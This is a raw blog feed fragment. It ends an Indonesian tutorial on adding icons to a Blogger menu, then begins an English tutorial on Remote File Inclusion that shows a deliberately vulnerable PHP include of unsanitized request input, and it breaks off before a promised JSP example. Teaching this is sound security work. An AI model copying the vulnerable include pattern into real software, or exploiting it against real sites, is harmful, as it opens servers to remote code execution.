style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-MLGUtY8G8JA/W0b4ejFHuxI/AAAAAAAAAG0/XA59RWLXC8QxD1ExcYzo2LEwiVV6CLnagCLcBGAs/s1600/Step%2B1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;603&quot; data-original-width=&quot;1103&quot; height=&quot;348&quot; src=&quot;https://1.bp.blogspot.com/-MLGUtY8G8JA/W0b4ejFHuxI/AAAAAAAAAG0/XA59RWLXC8QxD1ExcYzo2LEwiVV6CLnagCLcBGAs/s640/Step%2B1.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Jika sudah letakan code link CSS tadi dibawah Meta tag&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-yw1UIuunUfI/W0b46KPVZuI/AAAAAAAAAG8/aj4QjMlHnTMc09PPpWKOI34VtPJujhMOQCEwYBhgL/s1600/Step%2B2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;633&quot; data-original-width=&quot;1197&quot; height=&quot;337&quot; src=&quot;https://1.bp.blogspot.com/-yw1UIuunUfI/W0b46KPVZuI/AAAAAAAAAG8/aj4QjMlHnTMc09PPpWKOI34VtPJujhMOQCEwYBhgL/s640/Step%2B2.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Nah jika sudah selanjut nya kita klik Save Theme&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Selanjut nya kita pergi ke menu &lt;b&gt;Layout &amp;gt; Top Menu &lt;/b&gt;biasanya tiap Theme beda disini menu saya yaitu Top Menu (Navigasi).&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-ak4YvOBWk20/W0b6UdaqaoI/AAAAAAAAAHI/_oRZFec3gmEovH-YiOD3i35N44bMCJDBACLcBGAs/s1600/Step%2B3.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;741&quot; data-original-width=&quot;1275&quot; height=&quot;370&quot; src=&quot;https://3.bp.blogspot.com/-ak4YvOBWk20/W0b6UdaqaoI/AAAAAAAAAHI/_oRZFec3gmEovH-YiOD3i35N44bMCJDBACLcBGAs/s640/Step%2B3.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Oke jika sudah selanjut nya kita masukan script class icon nya&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&amp;lt;i class=&quot;&lt;span style=&quot;color: blue;&quot;&gt;icon code&lt;/span&gt;&quot;&amp;gt;&amp;nbsp;&lt;span style=&quot;color: red;&quot;&gt;(NamaMenuKamu)&lt;/span&gt;&amp;nbsp;&amp;lt;/i&amp;gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Contoh :&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&amp;lt;i class=&quot;&lt;span style=&quot;color: blue;&quot;&gt;fa fa-home&lt;/span&gt;&quot;&amp;gt; &lt;span style=&quot;color: red;&quot;&gt;Home&lt;/span&gt;&amp;nbsp;&amp;lt;/i&amp;gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;div&gt;Nah jika sudah Klik Save&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dan lihat Menu Navigasi Blog Kamu :p&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-9hZb2IxV56I/W0b7HlHBiXI/AAAAAAAAAHQ/Gg2y_OttlywbB7wWCqgZMey9xmZlyB_bgCLcBGAs/s1600/Finish.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;540&quot; data-original-width=&quot;1285&quot; height=&quot;268&quot; src=&quot;https://2.bp.blogspot.com/-9hZb2IxV56I/W0b7HlHBiXI/AAAAAAAAAHQ/Gg2y_OttlywbB7wWCqgZMey9xmZlyB_bgCLcBGAs/s640/Finish.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;So Tampilan menjadi lebih Gimana gitu, cukup mudah dan gratis  tanpa harus menyewa jasa developer yang tidak cukup murah harganya alias  mahal haha :p&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jika Masih kurang paham bisa lihat Video nya disini :&lt;br /&gt;Link : https://youtu.be/kV2nbRbz-ws&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&quot;&quot; class=&quot;YOUTUBE-iframe-video&quot; data-thumbnail-src=&quot;https://i.ytimg.com/vi/kV2nbRbz-ws/0.jpg&quot; frameborder=&quot;0&quot; height=&quot;266&quot; src=&quot;?feature=player_embedded&quot; width=&quot;320&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Selamat Beraktifitas kembali&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;(Zaenal Arifin)&lt;/b&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/1313718028046828588/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/cara-membuat-icon-menu-navigasi-di.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/1313718028046828588'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/1313718028046828588'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/cara-membuat-icon-menu-navigasi-di.html' title='Cara Membuat Icon Menu Navigasi di Blogger'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-MLGUtY8G8JA/W0b4ejFHuxI/AAAAAAAAAG0/XA59RWLXC8QxD1ExcYzo2LEwiVV6CLnagCLcBGAs/s72-c/Step%2B1.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-8736105316112492883</id><published>2018-07-12T06:49:00.003-07:00</published><updated>2018-07-22T15:03:06.914-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="RCE"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Remote File Inclusion (RFI) Tutorial</title><content type='html'>&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: medium; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Remote File Inclusion (RFI)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: medium; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; clear: both; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; text-align: center; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-STgq2BTRhOg/WztwgPJXDbI/AAAAAAAAAms/LW1Iz_0a9WI_egKjqxY0_cIVdjAd-3bBwCLcBGAs/s1600/Remote-File-Inclusion.jpg&quot; imageanchor=&quot;1&quot; style=&quot;background: 0px 0px; border: 0px; clear: none; color: #16a8e1; float: none; margin-left: 1em; margin-right: 1em; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; clear: both; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; text-align: center; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-pNG2Uj7tvHQ/Wzt6IBX63aI/AAAAAAAAAnQ/jYBd0nLuuQ8klxYYpgFcC_8j1a5WMaH2ACLcBGAs/s1600/Remote%2BFile%2BInclusion.png&quot; imageanchor=&quot;1&quot; style=&quot;background: 0px 0px; border: 0px; clear: none; color: #16a8e1; float: none; margin-left: 1em; margin-right: 1em; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;823&quot; data-original-width=&quot;1600&quot; height=&quot;328&quot; src=&quot;https://3.bp.blogspot.com/-pNG2Uj7tvHQ/Wzt6IBX63aI/AAAAAAAAAnQ/jYBd0nLuuQ8klxYYpgFcC_8j1a5WMaH2ACLcBGAs/s640/Remote%2BFile%2BInclusion.png&quot; style=&quot;background: 0px 0px; border: 0px; max-width: 100%; outline: 0px; padding: 0px; position: relative; transition: all 0.3s ease; vertical-align: baseline;&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; clear: both; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; text-align: center; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Hello Guys! In this article we will learn how to exploit a RFI vulnerability. I hope you have read my previous article on&amp;nbsp;&lt;a href=&quot;https://www.bandungdigitalsecurity.org/2018/07/file-inclusion-attack-lfirfi.html&quot; style=&quot;background: 0px 0px; border: 0px; color: #16a8e1; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Local File Inclusion&lt;/b&gt;&lt;/a&gt;, if you haven’t please go and read &amp;nbsp;that first.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; clear: both; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; text-align: center; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-LbvsWsatN9g/WztwUcv3iHI/AAAAAAAAAmo/ARnOgO3At8E-KaCIIuuw1m4IAZrrx0SjACLcBGAs/s1600/File%2BInclusion.jpg&quot; imageanchor=&quot;1&quot; style=&quot;background: 0px 0px; border: 0px; clear: none; color: #16a8e1; float: none; margin-left: 1em; margin-right: 1em; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;720&quot; data-original-width=&quot;1280&quot; height=&quot;360&quot; src=&quot;https://3.bp.blogspot.com/-LbvsWsatN9g/WztwUcv3iHI/AAAAAAAAAmo/ARnOgO3At8E-KaCIIuuw1m4IAZrrx0SjACLcBGAs/s640/File%2BInclusion.jpg&quot; style=&quot;background: 0px 0px; border: 0px; max-width: 100%; outline: 0px; padding: 0px; position: relative; transition: all 0.3s ease; vertical-align: baseline;&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Remote File Inclusion (RFI)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;As  the name states if the attacker can include a remote file to the victim  web app, it is called a Remote File Inclusion Vulnerability (RFI). Take  a look at this piece of code:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-family: Poppins; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Code :&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;$incfile = $_REQUEST[&quot;file&quot;]; include($incfile.&quot;.php&quot;);&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;As  you can see in the first line, it extracts the file parameter value  from the HTTP request made by the user, while the second line utilities  this value to set the file name. If the input is not being sanitized  properly it can be used to include malicious file from a remote server.  Here’s a vulnerable JSP code,&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Code :&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: 